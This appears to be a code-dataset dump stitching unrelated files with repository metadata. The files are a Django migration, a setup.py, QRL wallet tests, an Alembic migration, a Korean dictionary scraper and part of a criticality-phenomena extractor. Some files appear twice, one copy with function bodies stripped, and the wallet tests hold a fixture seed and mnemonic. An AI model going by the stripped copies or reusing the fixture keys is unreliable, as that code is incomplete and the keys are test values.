# Generated by Django 2.2.7 on 2019-11-18 16:44 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(help_text='Category Name', max_length=50, unique=True)), ('slug', models.CharField(max_length=50, unique=True)), ('timestamp', models.DateTimeField(auto_now_add=True)), ('updated_at', models.DateTimeField(auto_now=True)), ], options={ 'verbose_name_plural': 'Categories', }, ), migrations.CreateModel( name='Bookmark', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('desc', models.TextField(blank=True, help_text='Description', null=True)), ('title', models.CharField(blank=True, help_text='bookmark title', max_length=500, null=True, unique=True)), ('slug', models.CharField(max_length=500, unique=True)), ('url', models.URLField(blank=True, help_text='URL', max_length=2000, null=True)), ('timestamp', models.DateTimeField(auto_now_add=True)), ('updated_at', models.DateTimeField(auto_now=True)), ('category', models.ForeignKey(help_text='Category', on_delete=django.db.models.deletion.CASCADE, related_name='bookmarks', to='bookmark_app.Category')), ], ), ]
0
1,639
23
f675775f12c8350ddef35bc639c03e2223ccc8a6
1,931
py
Python
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
from setuptools import setup import os env = os.getenv('environment_name') or 'dev' if env == 'prd': setup( name='NHentai-API', version='0.0.17', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['NHentai', 'NHentai.entities', 'NHentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False ) elif env == 'dev': setup( name='dev-nhentai-build', version='0.0.6', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['dev_nhentai', 'dev_nhentai.entities', 'dev_nhentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False )
35.759259
83
0.612118
from setuptools import setup import os def readme(): with open('README.md') as f: return f.read() env = os.getenv('environment_name') or 'dev' if env == 'prd': setup( name='NHentai-API', version='0.0.17', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['NHentai', 'NHentai.entities', 'NHentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False ) elif env == 'dev': setup( name='dev-nhentai-build', version='0.0.6', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['dev_nhentai', 'dev_nhentai.entities', 'dev_nhentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False )
49
0
23
8f607160751ecb6032d08116ea48d35715e78810
25,103
py
Python
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
# coding=utf-8 # Distributed under the MIT software license, see the accompanying # file LICENSE or http://www.opensource.org/licenses/mit-license.php. from unittest import TestCase from mock import Mock from pyqrllib.pyqrllib import bin2hstr, hstr2bin from qrl.daemon.walletd import WalletD from qrl.generated import qrl_pb2 from qrl.core.txs.TransferTransaction import TransferTransaction from qrl.core.Wallet import WalletDecryptionError from qrl.core.misc import logger from tests.misc.helper import set_qrl_dir, get_alice_xmss, get_bob_xmss logger.initialize_default()
44.508865
120
0.569374
# coding=utf-8 # Distributed under the MIT software license, see the accompanying # file LICENSE or http://www.opensource.org/licenses/mit-license.php. from unittest import TestCase from mock import Mock from pyqrllib.pyqrllib import bin2hstr, hstr2bin from qrl.daemon.walletd import WalletD from qrl.generated import qrl_pb2 from qrl.core.txs.TransferTransaction import TransferTransaction from qrl.core.Wallet import WalletDecryptionError from qrl.core.misc import logger from tests.misc.helper import set_qrl_dir, get_alice_xmss, get_bob_xmss logger.initialize_default() class TestWalletD(TestCase): def __init__(self, *args, **kwargs): self.passphrase = '你好' self.qaddress = "Q010400ff39df1ba4d1d5b8753e6d04c51c34b95b01fc3650c10ca7b296a18bdc105412c59d0b3b" self.hex_seed = "0104008441d43524996f76236141d16b7b324323abf796e77ad" \ "7c874622a82f5744bb803f9b404d25733d0db82be7ac6f3c4cf" self.mnemonic = "absorb drank lute brick cure evil inept group grey " \ "breed hood reefy eager depict weed image law legacy " \ "jockey calm lover freeze fact lively wide dread spiral " \ "jaguar span rinse salty pulsar violet fare" super(TestWalletD, self).__init__(*args, **kwargs) def test_init(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() self.assertIsNotNone(walletd) def test_qaddress_to_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = "Q010600968c3408cba5192d75c11cec909e803fc590e82463216b5a04ce8e447f76b4e02c0d3d81" address = walletd.qaddress_to_address(qaddress) self.assertEqual(qaddress[1:], bin2hstr(address)) def test_authenticate(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.authenticate() walletd._wallet = Mock() walletd._wallet.encrypted = Mock(return_value=True) with self.assertRaises(ValueError): walletd.authenticate() def test_encrypt_last_item(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.authenticate() walletd.add_new_address(height=4) self.assertFalse(walletd.get_wallet_info()[2]) walletd._passphrase = self.passphrase walletd._encrypt_last_item() self.assertTrue(walletd.get_wallet_info()[2]) def test_get_wallet_index_xmss(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) index, xmss = walletd._get_wallet_index_xmss(qaddress, 0) self.assertEqual(index, 0) self.assertEqual(xmss.qaddress, qaddress) def test_add_new_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) def test_add_new_address2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 2) def test_add_address_from_seed(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress1 = walletd.add_address_from_seed(seed=self.hex_seed) # Using hexseed self.assertEqual(self.qaddress, qaddress1) self.assertEqual(len(walletd.list_address()), 1) def test_add_address_from_seed2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress1 = walletd.add_address_from_seed(seed=self.hex_seed) # Using hexseed self.assertEqual(self.qaddress, qaddress1) self.assertEqual(len(walletd.list_address()), 1) walletd.remove_address(self.qaddress) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seed=self.mnemonic) # Using mnemonic self.assertEqual(self.qaddress, qaddress2) self.assertEqual(len(walletd.list_address()), 1) def test_list_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) list_address = walletd.list_address() self.assertEqual(list_address[0], qaddress) def test_remove_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) result = walletd.remove_address(qaddress) self.assertTrue(result) self.assertEqual(len(walletd.list_address()), 0) def test_remove_address2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) result = walletd.remove_address(qaddress) self.assertTrue(result) self.assertEqual(len(walletd.list_address()), 0) result = walletd.remove_address("Q123") self.assertFalse(result) self.assertEqual(len(walletd.list_address()), 0) def test_get_recovery_seeds(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') seeds = walletd.get_recovery_seeds(qaddress) self.assertIsInstance(seeds, tuple) walletd.remove_address(qaddress) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seeds[0]) # Using Hex Seed self.assertEqual(qaddress, qaddress2) walletd.remove_address(qaddress2) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seeds[1]) # Using Mnemonic self.assertEqual(qaddress, qaddress2) walletd.remove_address(qaddress2) self.assertEqual(len(walletd.list_address()), 0) def test_get_wallet_info(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() version, len_address_items, encrypted = walletd.get_wallet_info() self.assertEqual(version, 1) self.assertEqual(len_address_items, 0) self.assertFalse(encrypted) def test_push_transaction(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() alice_xmss = get_alice_xmss() bob_xmss = get_bob_xmss() tx = TransferTransaction.create(addrs_to=[bob_xmss.address], amounts=[1], fee=1, xmss_pk=alice_xmss.pk) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) walletd._push_transaction(tx, alice_xmss) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.UNKNOWN)) with self.assertRaises(Exception): walletd._push_transaction(tx, alice_xmss) def test_relay_transfer_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_transfer_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_message_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_message_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_token_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_token_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_transfer_token_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_token_txn(qaddresses_to=qaddresses_to, amounts=amounts, token_txhash='', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_transfer_token_txn(qaddresses_to=qaddresses_to, amounts=amounts, token_txhash='', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_slave_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) slave_pks = [alice_xmss.pk] access_types = [0] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_slave_txn(slave_pks=slave_pks, access_types=access_types, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_slave_txn(slave_pks=slave_pks, access_types=access_types, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_encrypt_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() with self.assertRaises(ValueError): walletd.encrypt_wallet(passphrase=self.passphrase) walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) with self.assertRaises(Exception): walletd.encrypt_wallet(passphrase=self.passphrase) def test_lock_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.add_new_address() def test_unlock_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.add_new_address() with self.assertRaises(WalletDecryptionError): walletd.unlock_wallet(passphrase='pass123') walletd.unlock_wallet(passphrase=self.passphrase) walletd.add_new_address() self.assertEqual(len(walletd.list_address()), 2) def test_change_passphrase(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() passphrase2 = 'pass000' with self.assertRaises(ValueError): walletd.change_passphrase(old_passphrase='pass123', new_passphrase='pass234') walletd.change_passphrase(old_passphrase=self.passphrase, new_passphrase=passphrase2) with self.assertRaises(WalletDecryptionError): walletd.unlock_wallet(passphrase=self.passphrase) walletd.unlock_wallet(passphrase=passphrase2) qaddresses = walletd.list_address() self.assertEqual(len(qaddresses), 1) self.assertEqual(qaddresses[0], qaddress) def test_get_transactions_by_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetTransactionsByAddress = Mock( return_value=qrl_pb2.GetTransactionsByAddressResp(mini_transactions=[], balance=0)) mini_transactions, balance = walletd.get_transactions_by_address(qaddress=get_alice_xmss(4).qaddress) self.assertEqual(len(mini_transactions), 0) self.assertEqual(balance, 0) def test_get_transaction(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() tx = qrl_pb2.Transaction() tx.fee = 10 tx.transaction_hash = b'1234' tx.message.message_hash = b'hello' pk = '01020016ecb9f39b9f4275d5a49e232346a15ae2fa8c50a2927daeac189b8c5f2d1' \ '8bc4e3983bd564298c49ae2e7fa6e28d4b954d8cd59398f1225b08d6144854aee0e' tx.public_key = bytes(hstr2bin(pk)) walletd._public_stub.GetTransaction = Mock( return_value=qrl_pb2.GetTransactionResp(tx=tx, confirmations=10)) tx, confirmations = walletd.get_transaction(tx_hash='1234') self.assertIsNotNone(tx) self.assertEqual(tx.transaction_hash, bin2hstr(b'1234')) self.assertEqual(confirmations, 10) def test_get_balance(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetBalance = Mock( return_value=qrl_pb2.GetBalanceResp(balance=1000)) balance = walletd.get_balance(self.qaddress) self.assertEqual(balance, 1000) def test_get_ots(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetOTS = Mock( return_value=qrl_pb2.GetOTSResp(ots_bitfield=[b'\x00'] * 10, next_unused_ots_index=1)) ots_bitfield, next_unused_ots_index = walletd.get_ots(self.qaddress) self.assertEqual(ots_bitfield, [b'\x00'] * 10) self.assertEqual(next_unused_ots_index, 1) def test_get_height(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetHeight = Mock( return_value=qrl_pb2.GetHeightResp(height=1001)) height = walletd.get_height() self.assertEqual(height, 1001) def test_get_block(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() block = qrl_pb2.Block() block.header.hash_header = b'001122' block.header.block_number = 1 walletd._public_stub.GetBlock = Mock( return_value=qrl_pb2.GetBlockResp(block=block)) b = walletd.get_block('001122') self.assertEqual(b.header.hash_header, bin2hstr(block.header.hash_header)) self.assertEqual(b.header.block_number, block.header.block_number) def test_get_block_by_number(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() block = qrl_pb2.Block() block.header.hash_header = b'001122' block.header.block_number = 1 walletd._public_stub.GetBlockByNumber = Mock( return_value=qrl_pb2.GetBlockResp(block=block)) b = walletd.get_block_by_number(1) self.assertEqual(b.header.hash_header, bin2hstr(block.header.hash_header)) self.assertEqual(b.header.block_number, block.header.block_number) def test_get_address_from_pk(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() pk = '01020016ecb9f39b9f4275d5a49e232346a15ae2fa8c50a2927daeac189b8c5f2d1' \ '8bc4e3983bd564298c49ae2e7fa6e28d4b954d8cd59398f1225b08d6144854aee0e' address = walletd.get_address_from_pk(pk) self.assertEqual(address, 'Q010200670246b0026436b717f199e3ec5320ba6ab61d5eddff811ac199a9e9b871d3280178b343')
23,528
7
994
d1d129d88ef1dad9ac4e5229af7bdc3ff834ffcc
540
py
Python
fbd/migrations/versions/23184a5b4714_.py
olety/FBG
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
null
null
null
fbd/migrations/versions/23184a5b4714_.py
olety/FBG
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
11
2017-05-26T13:36:09.000Z
2021-08-17T14:37:32.000Z
fbd/migrations/versions/23184a5b4714_.py
olety/FBD
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
null
null
null
""" Revision ID: 23184a5b4714 Revises: 2fcbb8a6de94 Create Date: 2017-05-29 17:13:59.813275 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '23184a5b4714' down_revision = '2fcbb8a6de94' branch_labels = None depends_on = None
18.62069
65
0.681481
""" Revision ID: 23184a5b4714 Revises: 2fcbb8a6de94 Create Date: 2017-05-29 17:13:59.813275 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '23184a5b4714' down_revision = '2fcbb8a6de94' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ###
208
0
46
2ec8e0ea45f5424c33d13abaa9c4a1a92f1bdc80
2,011
py
Python
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
""" To do get hanja get multiple definitions on page example sentences """ from bs4 import BeautifulSoup import urllib.request import urllib.parse import time import re import random defin = [] class NaverDict: """ This class looks up korean vocabulary words using the Naver korean-english dictionary. """ def get_def(self, org_word): """ Looks up the word givein the params and returns a list of tuples of definitons because there may be more than one definition for words. If the definition was not found returns None """ kor_word = None eng_defs = "" eng_def = "" hanja = None #convert word from hangul into the percent characters #example converts korean word to %ED%95%9C%EB%B2%88 word = urllib.parse.quote(org_word) #put word in url url = self.url.replace('[word]', word) #time.sleep(random.randrange(4,10)) html = urllib.request.urlopen(url) soup = BeautifulSoup(html, 'html.parser') #returns a list of tag objects kor_word = soup.find(True, {'class':['first']}) try: kor_word = kor_word.span.a.string eng_defs = soup.find(True, {'class':['list_e2']}).dd.div.p.span #print(eng_def.children) for string in eng_defs.stripped_strings: eng_def += str(string) + " " #eng_def = eng_def.dd.div.p.string except Exception as e: #could not find word in naver dic return None #dont forget to get the hanja if kor_word is None: kor_word = org_word return [(org_word, kor_word, eng_def)] naver_dic = NaverDict() word = input("enter word: ") print(naver_dic.get_def(word))
26.116883
89
0.610144
""" To do get hanja get multiple definitions on page example sentences """ from bs4 import BeautifulSoup import urllib.request import urllib.parse import time import re import random defin = [] class NaverDict: """ This class looks up korean vocabulary words using the Naver korean-english dictionary. """ def __init__(self): #will replace [word] with the actual korean #word we want to query self.url = 'http://endic.naver.com/search.nhn?sLn=en&isOnlyViewEE=N&query=[word]' def get_def(self, org_word): """ Looks up the word givein the params and returns a list of tuples of definitons because there may be more than one definition for words. If the definition was not found returns None """ kor_word = None eng_defs = "" eng_def = "" hanja = None #convert word from hangul into the percent characters #example converts korean word to %ED%95%9C%EB%B2%88 word = urllib.parse.quote(org_word) #put word in url url = self.url.replace('[word]', word) #time.sleep(random.randrange(4,10)) html = urllib.request.urlopen(url) soup = BeautifulSoup(html, 'html.parser') #returns a list of tag objects kor_word = soup.find(True, {'class':['first']}) try: kor_word = kor_word.span.a.string eng_defs = soup.find(True, {'class':['list_e2']}).dd.div.p.span #print(eng_def.children) for string in eng_defs.stripped_strings: eng_def += str(string) + " " #eng_def = eng_def.dd.div.p.string except Exception as e: #could not find word in naver dic return None #dont forget to get the hanja if kor_word is None: kor_word = org_word return [(org_word, kor_word, eng_def)] naver_dic = NaverDict() word = input("enter word: ") print(naver_dic.get_def(word))
171
0
27
05a2e39a60bc35bf0b3e55b2cd50b1737d5d4513
17,967
py
Python
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
4
2022-03-13T19:33:43.000Z
2022-03-15T22:20:36.000Z
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
null
null
null
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
null
null
null
import logging import owlready2 import tqdm import auto.auto logger = logging.getLogger(__name__) _CACHED_CP_CLASSES = dict() class Scene_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scene-level criticality phenomena. Note that member traffic_model is a list of scenes. """ class Scenario_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scenario-level criticality phenomena. """ def phenomena_scenario(scenario: list or owlready2.World) -> list: """ scenario: Either a list of worlds, each world representing a single scene or a single world representing a whole scenario returns: A list of criticality phenomena objects (either scene or scenario) sorted by temporal occurrence """ cps = [] if type(scenario) == list: for scene in scenario: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scene) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scene) scenes = list(tm.search(type=tm.Scene)) if len(scenes) > 0: for scene_cp in scenario.search(type=cp_ont.Criticality_Phenomenon): scene_cp_obj = Scene_Criticality_Phenomenon(scenes[0], scene_cp, None) # TODO cps.append(scene_cp_obj) else: raise ValueError("No scenes found in scene world " + str(scene)) elif type(scenario) == owlready2.World: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scenario) ac = auto.auto.get_ontology(auto.auto.Ontology.Act, scenario) ti = auto.auto.get_ontology(auto.auto.Ontology.Time, scenario) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scenario) scenarios = list(scenario.search(type=tm.Scenario)) if len(scenarios) > 0: if logger.level == logging.DEBUG: search_space = tqdm.tqdm(list(scenario.search(type=cp_ont.Criticality_Phenomenon))) else: search_space = scenario.search(type=cp_ont.Criticality_Phenomenon) for cp in search_space: cp_clss = list(filter(lambda x: x in scenario.classes(), [y for y in cp.INDIRECT_is_a if hasattr(y, "namespace") and y.namespace.base_iri == "http://purl.org/auto/criticality_phenomena#"])) most_specific_cp_clss = [cp_cls for cp_cls in cp_clss if hasattr(cp_cls, "__subclasses__") and len(set(cp_cls.__subclasses__()).intersection(set(cp_clss))) == 0] for cp_cls in most_specific_cp_clss: objects = [None] if len(cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": cp, "subjects": []} exec(cp_cls.object_extraction_code[0], globals(), local_dict) objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(cp) + " (" + str(cp_cls) + "): " + str(e)) for object_dict in objects: if set(cp.INDIRECT_is_a).intersection({ac.Activity, ti.Interval}): scenario_cp_obj = Scenario_Criticality_Phenomenon(scenarios[0], cp, cp_cls, object_dict) cps.append(scenario_cp_obj) elif len(cp.in_traffic_model) > 0 and tm.Scene in cp.in_traffic_model[0].INDIRECT_is_a: scene_cp_obj = Scene_Criticality_Phenomenon(cp.in_traffic_model, cp, cp_cls, object_dict) cps.append(scene_cp_obj) else: raise ValueError("CP with no scene or scenario found: " + str(cp)) else: raise ValueError("No scenario found in scenario world " + str(scenario)) else: raise ValueError("Wrong scenario type: neither a list nor a world, but found " + str(type(scenario))) cps.sort(key=lambda x: x.time if type(x) is Scene_Criticality_Phenomenon else x.time[0]) return cps def list_cps(cps: list, output_format="natural", world=None, print_non_visualizable_info=False) -> str: """ Lists the given criticality phenomena in a given output format. If a world is given, checks if the phenomena are visualizable in the traffic model of the world. If format is natural, it returns a string of lines where each line 